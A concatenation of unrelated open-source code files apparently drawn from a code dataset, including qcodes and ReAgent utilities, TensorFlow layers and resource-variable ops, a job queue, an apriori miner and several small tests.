current_values=new_values)
# after the first action, no delay is inherited
delay = 0
except _QcodesBreak:
break
# after the first setpoint, delay reverts to the loop delay
delay = self.delay
# now check for a background task and execute it if it's
# been long enough since the last time
# don't let exceptions in the background task interrupt
# the loop
# if the background task fails twice consecutively, stop
# executing it
if self.bg_task is not None:
t = time.time()
if t - last_task >= self.bg_min_delay:
try:
self.bg_task()
except Exception:
if self.last_task_failed:
self.bg_task = None
self.last_task_failed = True
log.exception("Failed to execute bg task")
last_task = t
# run the background task one last time to catch the last setpoint(s)
if self.bg_task is not None:
log.debug('Running the background task one last time.')
self.bg_task()
# the loop is finished - run the .then actions
#log.debug('Finishing loop, running the .then actions...')
for f in self._compile_actions(self.then_actions, ()):
#log.debug('...running .then action {}'.format(f))
f()
# run the bg_final_task from the bg_task:
if self.bg_final_task is not None:
log.debug('Running the bg_final_task')
self.bg_final_task()
def _wait(self, delay):
if delay:
finish_clock = time.perf_counter() + delay
t = wait_secs(finish_clock)
time.sleep(t)
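# Hedged usage sketch (added; not part of the original module). It assumes the
# legacy qcodes API in which ManualParameter exists and Parameter.sweep() returns
# SweepValues; adjust the import path and names to your installation.
def _example_1d_loop():
    from qcodes.instrument.parameter import ManualParameter  # assumed import path
    gate = ManualParameter('gate', initial_value=0)
    signal = ManualParameter('signal', initial_value=1)
    # 11-point 1D sweep of `gate`, measuring `signal` at each setpoint,
    # kept in memory only (location=False) and run quietly.
    loop = Loop(gate.sweep(0, 1, num=11), delay=0.01).each(signal)
    return loop.run(location=False, quiet=True)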
|
the-stack_0_26000
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
# Please DO NOT import gym in here. We might have installation without gym depending on
# this module for typing
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass, field, fields
from typing import Any, Callable, Dict, List, Optional, Union
import numpy as np
import reagent.core.types as rlt
import torch
import torch.nn.functional as F
@dataclass
class Transition(rlt.BaseDataClass):
mdp_id: int
sequence_number: int
observation: Any
action: Any
reward: float
terminal: bool
log_prob: Optional[float] = None
possible_actions_mask: Optional[np.ndarray] = None
info: Optional[Dict] = None
    # Same as asdict but filters out None values.
def asdict(self):
return {k: v for k, v in asdict(self).items() if v is not None}
def get_optional_fields(cls) -> List[str]:
"""return list of optional annotated fields"""
ret: List[str] = []
for f in fields(cls):
        # An Optional[...] annotation is a Union whose __args__ include NoneType
if hasattr(f.type, "__args__") and type(None) in f.type.__args__:
ret.append(f.name)
return ret
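# Hedged sanity-check sketch (added, not part of the original module): for the
# Transition dataclass above, the Optional-annotated fields are exactly these three.
def _example_optional_fields() -> List[str]:
    names = get_optional_fields(Transition)
    assert names == ["log_prob", "possible_actions_mask", "info"]
    return names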
@dataclass
class Trajectory(rlt.BaseDataClass):
transitions: List[Transition] = field(default_factory=list)
def __post_init__(self):
self.optional_field_exist: Dict[str, bool] = {
f: False for f in get_optional_fields(Transition)
}
def __len__(self):
return len(self.transitions)
def add_transition(self, transition: Transition):
if len(self) == 0:
# remember which optional fields should be filled
for f in self.optional_field_exist:
val = getattr(transition, f, None)
if val is not None:
self.optional_field_exist[f] = True
# check that later additions also fill the same optional fields
for f, should_exist in self.optional_field_exist.items():
val = getattr(transition, f, None)
if (val is not None) != should_exist:
raise ValueError(
f"Field {f} given val {val} whereas should_exist is {should_exist}."
)
self.transitions.append(transition)
def __getattr__(self, attr: str):
ret = []
for transition in self.transitions:
ret.append(getattr(transition, attr))
return ret
def calculate_cumulative_reward(self, gamma: float = 1.0):
"""Return (discounted) sum of rewards."""
num_transitions = len(self)
assert num_transitions > 0, "called on empty trajectory"
rewards = self.reward
discounts = [gamma ** i for i in range(num_transitions)]
return sum(reward * discount for reward, discount in zip(rewards, discounts))
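    # Worked example (added for illustration): with rewards [1.0, 2.0, 3.0] and
    # gamma=0.5 this returns 1.0 + 0.5 * 2.0 + 0.25 * 3.0 = 2.75.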
def to_dict(self):
d = {"action": F.one_hot(torch.from_numpy(np.stack(self.action)), 2)}
for f in [
"observation",
"reward",
"terminal",
"log_prob",
"possible_actions_mask",
]:
if self.optional_field_exist.get(f, True):
f_value = getattr(self, f)
if np.isscalar(f_value[0]):
# scalar values
d[f] = torch.tensor(f_value)
else:
# vector values, need to stack
d[f] = torch.from_numpy(np.stack(f_value)).float()
return d
class Sampler(ABC):
"""Given scores, select the action."""
@abstractmethod
def sample_action(self, scores: Any) -> rlt.ActorOutput:
raise NotImplementedError()
@abstractmethod
def log_prob(self, scores: Any, action: torch.Tensor) -> torch.Tensor:
raise NotImplementedError()
def update(self) -> None:
"""Call to update internal parameters (e.g. decay epsilon)"""
pass
# From preprocessed observation, produce scores for sampler to select action
DiscreteScorer = Callable[[Any, Optional[np.ndarray]], Any]
ContinuousScorer = Callable[[Any], Any]
Scorer = Union[DiscreteScorer, ContinuousScorer]
# Transform ReplayBuffer's transition batch to trainer.train
TrainerPreprocessor = Callable[[Any], Any]
""" Called after env.step(action)
Args: (state, action, reward, terminal, log_prob)
"""
PostStep = Callable[[Transition], None]
""" Called after end of episode
"""
PostEpisode = Callable[[Trajectory], None]
@dataclass
class GaussianSamplerScore(rlt.BaseDataClass):
loc: torch.Tensor
scale_log: torch.Tensor
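# Hedged usage sketch (added; not part of the original module): builds a tiny
# two-step trajectory and exercises calculate_cumulative_reward(). The observation
# and action values are arbitrary placeholders.
def _example_trajectory() -> Trajectory:
    traj = Trajectory()
    for t in range(2):
        traj.add_transition(
            Transition(
                mdp_id=0,
                sequence_number=t,
                observation=np.zeros(4, dtype=np.float32),
                action=t % 2,  # discrete action in {0, 1}, matching the one-hot in to_dict()
                reward=1.0,
                terminal=(t == 1),
                log_prob=-0.5,
            )
        )
    # Discounted return with gamma=0.5: 1.0 + 0.5 * 1.0 = 1.5
    assert abs(traj.calculate_cumulative_reward(gamma=0.5) - 1.5) < 1e-6
    return traj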
|
the-stack_0_26001
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
import shutil
import tempfile
from telemetry.util import file_handle
class FileHandleUnittest(unittest.TestCase):
def setUp(self):
self.temp_file_txt = tempfile.NamedTemporaryFile(
suffix='.txt', delete=False)
self.abs_path_html = tempfile.NamedTemporaryFile(
suffix='.html', delete=False).name
def tearDown(self):
os.remove(self.abs_path_html)
def testCreatingFileHandle(self):
fh1 = file_handle.FromTempFile(self.temp_file_txt)
self.assertEquals(fh1.extension, '.txt')
fh2 = file_handle.FromFilePath(self.abs_path_html)
self.assertEquals(fh2.extension, '.html')
self.assertNotEquals(fh1.id, fh2.id)
def testOutputFiles(self):
fh1 = file_handle.FromTempFile(self.temp_file_txt)
fh2 = file_handle.FromFilePath(self.abs_path_html)
tmpdir = tempfile.mkdtemp()
try:
file_ids_to_paths = file_handle.OutputFiles([fh1, fh2], tmpdir)
expected_output_file_1_path = os.path.join(tmpdir, str(fh1.id) + '.txt')
expected_output_file_2_path = os.path.join(tmpdir, str(fh2.id) + '.html')
self.assertEqual(file_ids_to_paths[fh1.id], expected_output_file_1_path)
self.assertEqual(file_ids_to_paths[fh2.id], expected_output_file_2_path)
# Test that the files are actually output.
self.assertTrue(os.path.exists(expected_output_file_1_path))
self.assertTrue(os.path.exists(expected_output_file_2_path))
finally:
shutil.rmtree(tmpdir)
|
the-stack_0_26002
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains definition for bilinear grid sampling and mask pasting layers."""
from typing import List
import tensorflow as tf
class BilinearGridSampler(tf.keras.layers.Layer):
"""Bilinear Grid Sampling layer."""
  def __init__(self, align_corners: bool = False, **kwargs):
    """Initializes the bilinear grid sampling layer.
    Args:
      align_corners: A `bool`; if True, the centers of the 4 corner
pixels of the input and output tensors are aligned, preserving the
values at the corner pixels.
**kwargs: Additional kwargs arguments.
"""
super(BilinearGridSampler, self).__init__(**kwargs)
self.align_corners = align_corners
self._config = {
'align_corners': align_corners
}
def build(self, input_shape):
features_shape, _, _ = input_shape
_, height, width, channels = features_shape.as_list()
self._height = height
self._width = width
self._channels = channels
def _valid_coordinates(self, x_coord, y_coord):
return tf.logical_and(
tf.logical_and(
tf.greater_equal(x_coord, 0),
tf.greater_equal(y_coord, 0)),
tf.logical_and(
tf.less(x_coord, self._width),
tf.less(y_coord, self._height)))
def _get_pixel(self, features, x_coord, y_coord):
x_coord = tf.cast(x_coord, dtype=tf.int32)
y_coord = tf.cast(y_coord, dtype=tf.int32)
clipped_x = tf.clip_by_value(x_coord, 0, self._width - 1)
clipped_y = tf.clip_by_value(y_coord, 0, self._height - 1)
batch_size, _, _, _ = features.shape.as_list()
if batch_size is None:
batch_size = tf.shape(features)[0]
batch_indices = tf.reshape(
tf.range(batch_size, dtype=tf.int32),
shape=[batch_size, 1, 1])
batch_indices = tf.tile(
batch_indices,
multiples=[1, x_coord.shape[1], x_coord.shape[2]])
indices = tf.cast(
tf.stack([batch_indices, clipped_y, clipped_x], axis=-1),
dtype=tf.int32)
gathered_pixels = tf.gather_nd(features, indices)
return tf.where(
tf.expand_dims(self._valid_coordinates(x_coord, y_coord), axis=-1),
gathered_pixels,
tf.zeros_like(gathered_pixels))
def call(self, inputs):
features, x_coord, y_coord = inputs
x_coord += 1
y_coord += 1
if self.align_corners:
x_coord = (x_coord * 0.5) * (self._width - 1)
y_coord = (y_coord * 0.5) * (self._height - 1)
else:
x_coord = (x_coord * self._width - 1) * 0.5
y_coord = (y_coord * self._height - 1) * 0.5
left = tf.floor(x_coord)
top = tf.floor(y_coord)
right = left + 1
bottom = top + 1
top_left = (right - x_coord) * (bottom - y_coord)
top_right = (x_coord - left) * (bottom - y_coord)
bottom_left = (right - x_coord) * (y_coord - top)
bottom_right = (x_coord - left) * (y_coord - top)
i_top_left = self._get_pixel(features, left, top)
i_top_right = self._get_pixel(features, right, top)
i_bottom_left = self._get_pixel(features, left, bottom)
i_bottom_right = self._get_pixel(features, right, bottom)
i_top_left *= tf.expand_dims(top_left, axis=-1)
i_top_right *= tf.expand_dims(top_right, axis=-1)
i_bottom_left *= tf.expand_dims(bottom_left, axis=-1)
i_bottom_right *= tf.expand_dims(bottom_right, axis=-1)
interpolated_features = tf.math.add_n(
[i_top_left, i_top_right, i_bottom_left, i_bottom_right])
return interpolated_features
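  # Worked example of the normalized-coordinate mapping above (added): with
  # width=28 and align_corners=False, x=-1 maps to ((-1 + 1) * 28 - 1) * 0.5 = -0.5
  # and x=+1 maps to ((+1 + 1) * 28 - 1) * 0.5 = 27.5; with align_corners=True the
  # same inputs map to 0 and 27, the centers of the corner pixels.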
def get_config(self):
    return self._config
@classmethod
def from_config(cls, config):
return cls(**config)
class PasteMasks(tf.keras.layers.Layer):
"""Layer to paste instance masks."""
def __init__(self, output_size: List[int],
grid_sampler, **kwargs):
"""Resizes and pastes instance masks to match image size.
Args:
output_size: A `List` of integers that represent the height and width of
the output mask.
grid_sampler: A grid sampling layer. Currently only `BilinearGridSampler`
is supported.
**kwargs: Additional kwargs arguments.
"""
super(PasteMasks, self).__init__(**kwargs)
self._output_size = output_size
self._grid_sampler = grid_sampler
self._config = {
'output_size': output_size,
'grid_sampler': grid_sampler
}
def build(self, input_shape):
self._x_coords = tf.range(0, self._output_size[1], dtype=tf.float32)
self._y_coords = tf.range(0, self._output_size[0], dtype=tf.float32)
def call(self, inputs):
masks, boxes = inputs
y0, x0, y1, x1 = tf.split(boxes, 4, axis=1)
x_coords = tf.cast(self._x_coords, dtype=boxes.dtype)
y_coords = tf.cast(self._y_coords, dtype=boxes.dtype)
x_coords = (x_coords - x0) / (x1 - x0) * 2 - 1
y_coords = (y_coords - y0) / (y1 - y0) * 2 - 1
x_coords = tf.tile(
tf.expand_dims(x_coords, axis=1),
multiples=[1, self._output_size[0], 1])
y_coords = tf.tile(
tf.expand_dims(y_coords, axis=2),
multiples=[1, 1, self._output_size[1]])
pasted_masks = self._grid_sampler((masks, x_coords, y_coords))
return pasted_masks
def get_config(self):
    return self._config
@classmethod
def from_config(cls, config):
return cls(**config)
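# Hedged usage sketch (added; not part of the original module): pastes two 28x28
# instance masks into a 64x64 canvas. The mask contents and box coordinates below
# are arbitrary placeholders.
def _example_paste_masks() -> tf.Tensor:
  masks = tf.random.uniform([2, 28, 28, 1])     # [num_instances, height, width, channels]
  boxes = tf.constant([[4.0, 4.0, 36.0, 36.0],  # [y0, x0, y1, x1] per instance
                       [10.0, 20.0, 50.0, 60.0]])
  sampler = BilinearGridSampler(align_corners=False)
  paster = PasteMasks(output_size=[64, 64], grid_sampler=sampler)
  return paster((masks, boxes))                 # -> [2, 64, 64, 1]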
|
the-stack_0_26003
|
"""
This module provides a Job_queue class, and an example of use. One may drop in
either multiprocessing Prcoesses or threading Threads, as I have show in the
test suite.
"""
class Job_Queue(object):
"""
The goal of this class is to make a queue of processes to run, and go
through them running X number at any given time.
So if the bubble is 5 start with 5 running and move the bubble of running
procs along the queue looking something like this:
Start
...........................
[~~~~~]....................
___[~~~~~].................
_________[~~~~~]...........
__________________[~~~~~]..
____________________[~~~~~]
___________________________
End
"""
def __init__(self, max_running):
"""
        Set up the class to reasonable defaults.
"""
self._queued = []
self._running = []
self._completed = []
self._num_of_jobs = 0
self._max = max_running
self._finished = False
self._closed = False
self._debug = False
def _all_alive(self):
"""
Simply states if all procs are alive or not. Needed to determine when
to stop looping, and pop dead procs off and add live ones.
"""
if self._running:
return all([x.is_alive() for x in self._running])
else:
return False
def __len__(self):
"""
Just going to use number of jobs as the Job_Queue length.
"""
return self._num_of_jobs
def close(self):
"""
        A sanity check, so that the need to care about new jobs being added in
        the last throes of the job_queue's run is negated.
"""
if self._debug:
print("job queue closed.")
self._closed = True
def append(self, process):
"""
Add the Process() to the queue, so that later it can be checked up on.
That is if the Job_Queue is still open.
If the queue is closed, this will just silently do nothing.
"""
if not self._closed:
self._queued.append(process)
self._num_of_jobs += 1
if self._debug:
print("job queue appended %s." % process.name)
def _advance_the_queue(self):
"""
        Helper function to do the job of popping a new proc off the queue,
        starting it, then adding it to the running queue. This will eventually
        deplete the _queue, which is a condition for stopping the running
        while loop.
"""
while len(self._running) < self._max and self._queued:
job = self._queued.pop()
job.start()
self._running.append(job)
def start(self):
"""
        This is the workhorse. It will take the initial jobs from the _queue,
start them, add them to _running, and then go into the main running
loop.
This loop will check for done procs, if found, move them out of
_running into _completed. It also checks for a _running queue with open
spots, which it will then fill as discovered.
To end the loop, there have to be no running procs, and no more procs
to be run in the queue.
        When everything is finished, it will exit the loop and join the completed jobs.
"""
if not self._closed:
raise Exception("Need to close() before starting.")
if self._debug:
print("Job queue starting.")
print("Job queue intial running queue fill.")
self._advance_the_queue()
while not self._finished:
if self._debug:
print("Job queue running queue filling.")
self._advance_the_queue()
if not self._all_alive():
for id, job in enumerate(self._running):
if not job.is_alive():
if self._debug:
print("Job queue found finished proc: %s." %
job.name)
done = self._running.pop(id)
self._completed.append(done)
if self._debug:
print("Job queue has %d running." % len(self._running))
if not (self._queued or self._running):
if self._debug:
print("Job queue finished.")
for job in self._completed:
job.join()
self._finished = True
#### Sample
def try_using(parallel_type):
"""
    This will run the queue through its paces, and show a simple way of using
the job queue.
"""
def print_number(number):
"""
Simple function to give a simple task to execute.
"""
print(number)
if parallel_type == "multiprocessing":
from multiprocessing import Process as Bucket
elif parallel_type == "threading":
from threading import Thread as Bucket
    # Make a job_queue with a bubble of len 2, and have it print verbosely
jobs = Job_Queue(2)
jobs._debug = True
# Add 20 procs onto the stack
for x in range(20):
jobs.append(Bucket(
target = print_number,
args = [x],
kwargs = {},
))
    # Close up the queue and then start its execution
jobs.close()
jobs.start()
if __name__ == '__main__':
try_using("multiprocessing")
try_using("threading")
|
the-stack_0_26005
|
# -*- coding: utf-8 -*-
import sys
from py12306.app import *
from py12306.log.common_log import CommonLog
from py12306.query.query import Query
from py12306.user.user import User
from py12306.web.web import Web
def main():
load_argvs()
CommonLog.print_welcome()
App.run()
CommonLog.print_configs()
App.did_start()
App.run_check()
Query.check_before_run()
    ####### Run the tasks
Web.run()
User.run()
Query.run()
if not Const.IS_TEST:
while True:
sleep(10000)
else:
        if Config().is_cluster_enabled(): stay_second(5)  # wait until pending notifications have been received
CommonLog.print_test_complete()
def test():
"""
    Feature self-check
    Includes:
        account/password verification (captcha)
        seat verification
        passenger verification
        voice verification code check
        notification check
    :return:
"""
Const.IS_TEST = True
Config.OUT_PUT_LOG_TO_FILE_ENABLED = False
if '--test-notification' in sys.argv or '-n' in sys.argv:
Const.IS_TEST_NOTIFICATION = True
pass
def load_argvs():
if '--test' in sys.argv or '-t' in sys.argv: test()
config_index = None
if '--config' in sys.argv: config_index = sys.argv.index('--config')
if '-c' in sys.argv: config_index = sys.argv.index('-c')
if config_index:
Config.CONFIG_FILE = sys.argv[config_index + 1:config_index + 2].pop()
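
# Hedged usage notes (illustrative; the entry-point and config file names below
# are examples only). Based on load_argvs() above, typical invocations are:
#   python main.py                   # normal run
#   python main.py -t                # self-test mode (--test)
#   python main.py -t -n             # self-test including notification checks (--test-notification)
#   python main.py -c ./config.json  # use an alternate config file (--config)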
if __name__ == '__main__':
main()
|
the-stack_0_26009
|
import csv
import itertools
from pandas import DataFrame
class Armin:
def apriori(self, input_filename, output_filename, min_support_percentage, min_confidence):
transactions = {}
# Opens desired csv file
with open(input_filename, 'r') as csv_file:
csv_reader = csv.reader(csv_file)
# Parses each row and creates dictionary where transaction id is the key and values are added as a list
for row in csv_reader:
i = 0
key = -1
values = []
for cell in row:
if i == 0:
key = cell
else:
values.append(cell)
i += 1
transactions[key] = values
# Parsed data is converted into pandas dataframe object
df = DataFrame.from_dict(transactions, orient='index')
# Dataframe is iterated over and occurrences of each value is calculated and stored in dictionary
support_counts = {}
total_transactions = 0
for row in list(df.values):
for value in row:
if value not in support_counts.keys():
if value is not None:
support_counts[value] = 1
else:
support_counts[value] += 1
total_transactions += 1
# Support percentage is created and if support percentage >= min support percentage then it is added to vfi
vfi = {}
for key, value in support_counts.items():
support_percentage = value / total_transactions
if support_percentage >= min_support_percentage:
vfi[key] = (support_percentage, value)
        # Build all itemset combinations of sizes 1 to len(vfi.keys()) and keep those meeting min support
new_vfi = {}
for num in range(1, len(vfi.keys()) + 1):
for combination in itertools.combinations(vfi.keys(), num):
if len(combination) == 1:
new_vfi[combination[0]] = vfi[combination[0]][0]
else:
support = calculate_support(combination, df, total_transactions)
if support >= min_support_percentage:
new_vfi[combination] = support
# List contains all possible combinations
combo_list = []
for combo in new_vfi.keys():
combo_list.append(combo)
r_output = []
i = 0
while i < len(combo_list):
j = 0
while j < len(combo_list):
                # Makes sure left- and right-hand sides do not contain the same element(s)
check = False
for x in combo_list[i]:
for y in combo_list[j]:
if x == y:
check = True
if combo_list[i] != combo_list[j] and not check:
# Creates unique list which stores union of X and Y
union = [combo_list[i]] + [combo_list[j]]
unique = []
for u in union:
if len(u) > 1:
for u2 in u:
unique.append(u2)
else:
unique.append(u)
# Calculates support of X
support_x = calculate_support(combo_list[i], df, total_transactions)
# Calculates support of X U Y
support_y = calculate_support(unique, df, total_transactions)
# Calculates confidence
confidence = support_y / support_x
# Set added to output if confidence and support meet thresholds
if confidence >= min_confidence and support_y >= min_support_percentage:
r_output.append([support_y, confidence, combo_list[i], combo_list[j]])
j += 1
i += 1
# Writes output to target file
with open(output_filename, mode='w') as output_file:
# Output for S rows
for keys, value in new_vfi.items():
key = ""
keys = sorted(keys)
for k in keys:
key += k
key += ','
key = key[:-1]
output_file.write("S,%s,%s\n" % (format(value, '.4f'), key))
# Output for R rows
for data in r_output:
left = ""
for v in data[2]:
left += v
left += ','
left = left[:-1]
right = ""
for v in data[3]:
right += v
right += ','
right = right[:-1]
output_file.write("R,%s,%s,%s,'=>',%s\n" % (format(data[0], '.4f'), format(data[1], '.4f'), left, right))
# Calculates support of given list
def calculate_support(combination, df, total_transactions):
occurrences = 0
for row in list(df.values):
if set(combination).issubset(set(row)):
occurrences += 1
return occurrences / total_transactions
if __name__ == "__main__":
armin = Armin()
armin.apriori('input.csv', 'output.sup=0.5,conf=0.7.csv', 0.5, 0.7)
armin.apriori('input.csv', 'output.sup=0.5,conf=0.8.csv', 0.5, 0.8)
armin.apriori('input.csv', 'output.sup=0.6,conf=0.8.csv', 0.6, 0.8)
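

# Hedged sketch (not part of the original assignment): a quick sanity check of
# calculate_support() on a tiny, hand-made DataFrame. Two of the three
# transactions below contain both 'A' and 'B', so the expected support is 2/3.
def _demo_calculate_support():
    demo_df = DataFrame.from_dict(
        {"t1": ["A", "B"], "t2": ["A", "B"], "t3": ["A", "C"]}, orient="index")
    # Prints 0.666..., i.e. 2 of 3 transactions contain the itemset ('A', 'B').
    print(calculate_support(("A", "B"), demo_df, total_transactions=3))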
|
the-stack_0_26010
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore.nn as nn
import mindspore.context as context
from mindspore import Tensor
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
def __init__(self, sigma=1.0):
super(Net, self).__init__()
self.SmoothL1Loss = P.SmoothL1Loss(sigma)
def construct(self, pred, gt):
return self.SmoothL1Loss(pred, gt)
def test_net():
pred = np.random.randn(2, 4).astype(np.float32)
gt = np.random.randn(2, 4).astype(np.float32)
smooth_l1_loss = Net()
loss = smooth_l1_loss(Tensor(pred), Tensor(gt))
print("------------- input ---------------")
print("predict:\n", pred)
print("grount truth:\n", gt)
print("------------- output ---------------")
print("loss:\n", loss.asnumpy())
|
the-stack_0_26011
|
# Numpy is imported, seed is set
# Starting step
step = 50
dice = 6
# Roll the dice
dice = np.random.randint(1,7)
# Finish the control construct
if dice <= 2 :
step = step - 1
elif dice <=5 :
step = step + 1
else:
step = step + np.random.randint(1,7)
# Print out dice and step
print(dice)
print(step)
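
# Hedged extension (illustrative): repeating the same roll/step update many
# times yields a full random walk. As the first comment states, `np` and the
# seed are assumed to be set up earlier; the walk length of 100 is arbitrary.
random_walk = [step]
for _ in range(100):
    step = random_walk[-1]
    dice = np.random.randint(1, 7)
    if dice <= 2:
        step = step - 1
    elif dice <= 5:
        step = step + 1
    else:
        step = step + np.random.randint(1, 7)
    random_walk.append(step)
print(random_walk[-1])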
|
the-stack_0_26013
|
"""
Problem 026 on CSPLib
Examples of Execution:
python3 SportsScheduling.py
python3 SportsScheduling.py -data=10
python3 SportsScheduling.py -data=10 -variant=dummy
"""
from pycsp3 import *
nTeams = data or 8
nWeeks, nPeriods, nMatches = nTeams - 1, nTeams // 2, (nTeams - 1) * nTeams // 2
def match_number(t1, t2):
return nMatches - ((nTeams - t1) * (nTeams - t1 - 1)) // 2 + (t2 - t1 - 1)
table = {(t1, t2, match_number(t1, t2)) for t1, t2 in combinations(range(nTeams),2)}
# h[w][p] is the home team at week w and period p
h = VarArray(size=[nWeeks, nPeriods], dom=range(nTeams))
# a[w][p] is the away team at week w and period p
a = VarArray(size=[nWeeks, nPeriods], dom=range(nTeams))
# m[w][p] is the number of the match at week w and period p
m = VarArray(size=[nWeeks, nPeriods], dom=range(nMatches))
satisfy(
# linking variables through ternary table constraints
[(h[w][p], a[w][p], m[w][p]) in table for w in range(nWeeks) for p in range(nPeriods)],
# all matches are different (no team can play twice against another team)
AllDifferent(m),
# each week, all teams are different (each team plays each week)
[AllDifferent(h[w] + a[w]) for w in range(nWeeks)],
# each team plays at most two times in each period
[Cardinality(h[:, p] + a[:, p], occurrences={t: range(1, 3) for t in range(nTeams)}) for p in range(nPeriods)],
# tag(symmetry-breaking)
[
# the match '0 versus t' (with t strictly greater than 0) appears at week t-1
[Count(m[w], value=match_number(0, w + 1)) == 1 for w in range(nWeeks)],
# the first week is set : 0 vs 1, 2 vs 3, 4 vs 5, etc.
[m[0][p] == match_number(2 * p, 2 * p + 1) for p in range(nPeriods)]
]
)
if variant("dummy"):
# hd[p] is the home team for the dummy match of period p tag(dummy-week)
hd = VarArray(size=nPeriods, dom=range(nTeams))
# ad[p] is the away team for the dummy match of period p tag(dummy-week)
ad = VarArray(size=nPeriods, dom=range(nTeams))
satisfy(
# handling dummy week (variables and constraints) tag(dummy-week)
[
# all teams are different in the dummy week
AllDifferent(hd + ad),
# each team plays two times in each period
[Cardinality(h[:, p] + a[:, p] + [hd[p], ad[p]], occurrences={t: 2 for t in range(nTeams)}) for p in range(nPeriods)],
# tag(symmetry-breaking)
[hd[p] < ad[p] for p in range(nPeriods)]
]
)
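
# Hedged sanity check (illustrative, not part of the model): match_number()
# should map every pair t1 < t2 to a distinct id in 0..nMatches-1. This plain
# Python helper verifies that bijection and can be called by hand.
def _check_match_numbering():
    from itertools import combinations as _combinations
    ids = {match_number(t1, t2) for t1, t2 in _combinations(range(nTeams), 2)}
    assert ids == set(range(nMatches))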
|
the-stack_0_26014
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to use variables as resources."""
# pylint: disable=g-bad-name
import contextlib
import functools
import weakref
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import variable_pb2
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.compat import compat as forward_compat
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import auto_control_deps_utils as acd
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import handle_data_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_resource_variable_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.types import core
from tensorflow.python.util import _pywrap_utils
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
acd.register_read_only_resource_op("ReadVariableOp")
acd.register_read_only_resource_op("VariableShape")
acd.register_read_only_resource_op("ResourceGather")
acd.register_read_only_resource_op("ResourceGatherNd")
acd.register_read_only_resource_op("_ReadVariablesOp")
# TODO(allenl): Remove this alias and migrate callers.
get_resource_handle_data = handle_data_util.get_resource_handle_data
def get_eager_safe_handle_data(handle):
"""Get the data handle from the Tensor `handle`."""
assert isinstance(handle, ops.Tensor)
if isinstance(handle, ops.EagerTensor):
return handle._handle_data # pylint: disable=protected-access
else:
return get_resource_handle_data(handle)
def _set_handle_shapes_and_types(tensor, handle_data, graph_mode):
"""Sets the shape inference result HandleData on tensor.
Args:
tensor: A `Tensor` or `EagerTensor`.
handle_data: A `CppShapeInferenceResult.HandleData`.
graph_mode: A python bool.
"""
tensor._handle_data = handle_data # pylint: disable=protected-access
if not graph_mode:
return
# Not an EagerTensor, so a graph tensor.
shapes, types = zip(*[(pair.shape, pair.dtype)
for pair in handle_data.shape_and_type])
ranks = [len(s.dim) if not s.unknown_rank else -1 for s in shapes]
shapes = [
[d.size for d in s.dim] # pylint: disable=g-complex-comprehension
if not s.unknown_rank else None for s in shapes
]
pywrap_tf_session.TF_GraphSetOutputHandleShapesAndTypes_wrapper(
tensor._op._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
shapes,
ranks,
types)
def _combine_handle_data(handle, initial_value):
"""Concats HandleData from tensors `handle` and `initial_value`.
Args:
handle: A `Tensor` of dtype `resource`.
initial_value: A `Tensor`.
Returns:
A `CppShapeInferenceResult.HandleData`. If `initial_value` has dtype
`variant`, the `HandleData` contains the concatenation of the shape_and_type
from both `handle` and `initial_value`.
Raises:
RuntimeError: If handle, which was returned by VarHandleOp, either has
no handle data, or its len(handle_data.shape_and_type) != 1.
"""
assert handle.dtype == dtypes.resource
variable_handle_data = get_eager_safe_handle_data(handle)
if initial_value.dtype != dtypes.variant:
return variable_handle_data
extra_handle_data = get_eager_safe_handle_data(initial_value)
if extra_handle_data is not None and extra_handle_data.is_set:
if (variable_handle_data is None or not variable_handle_data.is_set or
len(variable_handle_data.shape_and_type) != 1):
raise RuntimeError(
"Expected VarHandleOp to return a length==1 shape_and_type, "
f"but saw: '{variable_handle_data}'")
variable_handle_data.shape_and_type.extend(extra_handle_data.shape_and_type)
return variable_handle_data
def _variable_handle_from_shape_and_dtype(shape,
